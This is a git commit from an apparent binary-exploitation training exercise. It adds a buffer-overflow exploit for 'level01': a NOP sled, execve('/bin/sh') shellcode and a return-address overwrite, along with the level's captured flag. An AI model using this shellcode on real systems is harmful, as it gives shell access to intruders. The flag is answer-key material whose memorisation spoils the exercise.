feat: level01 + level02 elf

This commit is contained in:
gbrochar 2025-05-03 12:59:00 +02:00
parent 29ddb8fa52
commit 9852844efe
5 changed files with 4 additions and 0 deletions

View File

@ -0,0 +1 @@
(cat /tmp/dat_wil_payload; cat /tmp/exploit_level01_jump; cat) | ./level01

View File

@ -0,0 +1 @@
python -c "print('dat_wil'+'\x90'*150+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > /tmp/dat_wil_payload

View File

@ -0,0 +1 @@
python -c "print('A'*80+'\x60\xa0\x04\x08')" > /tmp/exploit_level01_jump

1
level01/flag Normal file
View File

@ -0,0 +1 @@
PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv

BIN
level02/Ressources/level02 Executable file

Binary file not shown.